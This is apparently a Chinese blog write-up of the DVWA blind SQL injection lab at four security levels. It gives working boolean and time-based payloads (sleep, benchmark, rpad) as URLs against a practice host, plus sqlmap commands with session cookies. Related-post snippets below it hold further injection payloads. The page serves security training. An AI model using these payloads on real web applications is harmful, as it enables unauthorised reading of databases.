DVWA--SQLInjection(blind)

最新推荐文章于 2025-06-18 16:18:21 发布
原创 最新推荐文章于 2025-06-18 16:18:21 发布 · 540 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

这篇博客详细介绍了DVWA(Damn Vulnerable Web Application)中的SQL Injection漏洞,从Low、Medium、High到Impossible四个等级,探讨了不同等级的注入方式和应对策略。在Low等级中,通过布尔型和延时型手工注入确定了数据库名为'dvwa'。Medium等级利用sqlmap获取数据库名。在High等级,虽然sqlmap注入失败,但通过修改cookie中的id参数成功获取了数据库名。Impossible等级展示了通过预编译绑定变量防止SQL注入的有效性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Low等级

在这里插入图片描述
在这里插入图片描述
确定注入poc
在这里插入图片描述
在这里插入图片描述
1.手工注入(布尔型)
确定字符串长度
在这里插入图片描述在这里插入图片描述
确定字符串内容
在这里插入图片描述
在这里插入图片描述
(二分法,步骤省略)
得到:
substr(database(),1,1)=’d’
substr(database(),2,1)=’v’
substr(database(),3,1)=’w’
substr(database(),4,1)=’a’
database() =’dvwa’
2.手工注入(延时型)
确定字符串长度(sleep)
https://dvwa.practice.rois.io/vulnerabilities/sqli_blind/?id=1' and sleep(if(length(database())=4,5,0))-- &Submit=Submit在这里插入图片描述
https://dvwa.practice.rois.io/vulnerabilities/sqli_blind/?id=1' and sleep(if(length(database())=5,5,0))-- &Submit=Submit在这里插入图片描述

确定字符串长度(benchmark)

https://dvwa.practice.rois.io/vulnerabilities/sqli_blind/?id=1' and benchmark(if(length(database())=4,5000000,0),md5('test'));-- &Submit=Submit

在这里插入图片描述

https://dvwa.practice.rois.io/vulnerabilities/sqli_blind/?id=1' and benchmark(if(length(database())=5,5000000,0),md5('test'));-- &Submit=Submit

在这里插入图片描述

确定字符串长度(rpad)
https://dvwa.practice.rois.io/vulnerabilities/sqli_blind/?id=1' and if(length(database())=4,concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')),0);-- &Submit=Submit在这里插入图片描述https://dvwa.practice.rois.io/vulnerabilities/sqli_blind/?id=1' and if(length(database())=5,concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')),0);-- &Submit=Submit在这里插入图片描述
省略确定字符串内容部分
3.sqlmap
python sqlmap.py -u "https://dvwa.practice.rois.io/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" -p "id" --cookie "PHPSESSID=23i44gbd9l7omad5h09cebd1f7; security=low" --current-db
在这里插入图片描述

Medium等级

在这里插入图片描述
利用sqlmap获取数据库名
python sqlmap.py -u " https://dvwa.practice.rois.io/vulnerabilities/sqli_blind/" --data "id=1&Submit=Submit" -p "id" --cookie " PHPSESSID=pqsnp4fk48uek23a6qs5k47gt2; security=medium" --current-db
在这里插入图片描述

High等级

在这里插入图片描述
用sqlmap进行注入
python sqlmap.py -u "https://dvwa.practice.rois.io/vulnerabilities/sqli_blind/cookie-input.php" --data "id=1&Submit=Submit" -p "id" --cookie " PHPSESSID=166rs1ts9sdpjoqcto11j16n56; security=high" --second-url "https://dvwa.practice.rois.io/vulnerabilities/sqli_blind/"
注入失败
在这里插入图片描述
发现cookie中包含有id参数
在这里插入图片描述
添加id=1到cookie中
python sqlmap.py -u "https://dvwa.practice.rois.io/vulnerabilities/sqli_blind/cookie-input.php" --data "id=1&Submit=Submit" -p "id" --cookie "id=1;PHPSESSID=166rs1ts9sdpjoqcto11j16n56; security=high" --second-url "https://dvwa.practice.rois.io/vulnerabilities/sqli_blind/" –current-db
成功获取数据库名
在这里插入图片描述

Impossible等级

检测了id数据类型,使用预编译绑定id变量,有效防止了sql注入

在这里插入图片描述

Vr.ka
关注
dvwa-sql injection(blind)
Alter__的博客
05-31 891
盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知。         盲注分为基于布尔的盲注、基于时间的盲注以及基于报错的盲注。  1.判断是否存在注入,注入是字符型还是数字型 2.猜解当前数据库名 3.猜解数据库中的表名 4.猜解表中的字段名 5.猜解数据 low
DVWA靶场-SQL Injection (Blind)SQL注入盲注
mlws1900的博客
03-19 1762
直接使用报错:' union select 1,count(*),concat('/',(select @@datadir),'/',floor(rand(0)*2))a from information_schema.columns group by a--+盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。length:正整数,指定将从左边返回的字符数。
DVWA下的SQL Injection(Blind)
07-25
盲注
SQL 盲注(Blind SQL Injection)
最新发布
weixin_43435891的博客
06-18 629
《SQL盲注攻防实践指南》摘要 本文通过DVWA靶场演示SQL盲注攻击技术,包含布尔型和时间型两种盲注方法。布尔型盲注通过页面响应差异判断条件真假,逐步推断数据库信息;时间型盲注利用延迟响应识别结果。文章详细展示了从基础判断到逐字符猜解数据库名的完整过程,并介绍了自动化工具sqlmap的使用。最后强调了参数化查询、输入验证、最小权限和WAF等防御措施。通过实战演练帮助理解盲注原理与防护方法,适合安全研究人员学习参考。
DVWA 之 SQL Injection(Blind)
baynk的博客
10-29 1273
汇总链接: https://baynk.blog.youkuaiyun.com/article/details/100006641 ------------------------------------------------------------------分割线------------------------------------------------------------------ SQL ...
DVWA------SQL Injection (Blind)(SQL盲注)
m0_65712192的博客
12-09 3936
DVWA------SQL Injection (Blind)(SQL盲注)
SQL Injection (Blind) Low
weixin_33785108的博客
12-03 192
SQL盲注分析 盲注较普通注入难度会有所增加,根据页面响应不同大概分为以下几种:布尔型盲注;时间盲注;报错注入 普通注入与盲注的对比: 普通注入: 盲注: 1.当执行注入攻击时服务器会响应来自数据库 ...
DVWA通关--SQL盲注(SQL Injection(Blind))
箭雨镜屋
07-11 3941
LOW 通关步骤 代码分析 MEDIUM 通关步骤 代码分析 HIGH 通关步骤 代码分析 IMPOSSIBLE 代码分析
DVWA--SQL Injection(Blind)(SQL盲注)(全难度)
wwxxee
03-03 361
DVWA–SQL Injection (Blind)(SQL盲注) 原理参考:网络安全笔记-99-渗透-SQL注入 逻辑 输入框输入ID,然后判断该ID是否存在 难度分级 Low 核心代码 <?php if( isset( $_GET[ 'Submit' ] ) ) { // Get input $id = $_GET[ 'id' ]; // Check database $getid = "SELECT first_name, last_name FROM u
DVWA--- 八、sql盲注(SQL Injection Blind)
qq_43168364的博客
05-31 891
SQL Injection Blind 目录 一、low级别 二、Medium级别 三、High级别 四、Impossible级别 五、预防方法 一、low级别 注入点在输入框中,当输入正确时回显如下图 输入错误时的回显 根据回显不同进行布尔盲注,接下来判断注入类型 这里是字符型注入点字符型注入点 判断库名长度,命令:1' and length(database())=4 # 判断库名,命令:1and ascii(substr(database(),x,1))=100 #让x的值递增可以遍
DVWA】20. SQL Injection (Blind)SQL注入盲注(全等级Sqlmap版)
Zichel77的博客
04-08 2590
盲注,有两种主要类型,包括布尔盲注和时间盲注。
DVWA学习之SQL Injection(Blind,盲注)
weixin_40950781的博客
08-20 1058
DVWA学习之SQL Injection(Blind)(SQL 盲注入)SQL Injection(Blind0x01 SQL Injection(Blind1. SQL盲注与普通的SQL注入区别2.基于注入点注入分类3.基于提交方式的注入3.基于页面响应方式的盲注分类4.盲注测试思路5.盲注测试流程6.常用判断ID0x02 low级别1.判断是否存在注入,注入的类型2.猜解当前的数据库名称0...
DVWA-SQL Injection(Blind)
tycyj的博客
01-24 243
LOW 1.判断是否存在注入 输入1 显示用户存在 输入1and 1 = 1 – ’ 显示用户存在 输入1and 1 = 2 – ’ 显示用户不存在,说明存在字符型的SQL盲注。 2.猜解SQL查询语句中的字段数 输入1’ or 1 = 1 order by 1 – ’ 显示不存在 输入1’ or 1 = 1 order by 2 – ’ 显示存在 输入1’ or 1 = 1 order by 3 – ’ 显示不存在,说明该SQL查询语句中只有2个字段 3.获取当前数据库 输入1and
DVWA之SQL Injection (Blind)
kukudeshuo的博客
03-21 272
DVWA之SQL Injection (Blind) low 查看源代码可知,对输入字符串没有进行任何过滤 <?php if( isset( $_GET[ 'Submit' ] ) ) { // Get input $id = $_GET[ 'id' ]; // Check database $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; $result
DVWA-SQL Injection(Blind盲注)
Cwillchris的博客
10-28 1121
实验环境: DVWA靶机:172.16.12.10 windos攻击机:172.16.12.7 kali攻击机:172.16.12.30 实验步骤: SQLInjectionBlind),即SQL盲注,与一般注入的区别在于,一般的注入 攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。 盲注分为基于布尔的盲注、基于时间的盲注以及基于报错.
dvwa之sql injection(blind)
Alsn86的博客
01-27 945
dvwa之 sql injection(blind) sql injection(blind)之low等级 1.判断出是字符型 2.看当前数据库名字长度1and length(database())=4;# 显示正确 所以数据库名长度为4 3.判断数据库名字为dvwa 1and substr(database(),1,1)=‘d’;# 判断出数据库名字第一个字符为’d’ 1and substr(database(),2,1)=‘d’;# 判断出数据库名字第一个字符为’v’ 1and
DVWA】SQL Injection (Blind)
「我唯一会的和擅长的只有网络安全,如果我不能在我最擅长的事情上取得成功,那么我根本不知道,我的人生还有什么意义。」
12-06 1402
人的一生应当如何度过,我希望当我回首往事时,不因虚度年华而悔恨,也不因碌碌无为而羞愧,我可以对自己说:我不负此生。
DVWA-SQL Injection (Blind)
05-28 1677
其实做完之后可以发现基于布尔的盲注根据页面返回信息猜解数据库信息,而基于时间的盲注没有页面返回信息,它是通过页面response时间来猜解数据库信息,就是把布尔的payload主要部分放在了if函数的第一位(条件表达式),转移到sleep或者1之后根据页面response判断表达式的真假,从而猜解数据库信息。
dvwa sql injection (blind)
03-16
DVWA SQL注入(盲注)是一种攻击技术,利用应用程序中的漏洞,通过注入恶意代码来获取敏感数据或者控制应用程序。在盲注中,攻击者无法直接获取数据库中的数据,而是通过不断尝试不同的注入语句,观察应用程序的反应...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值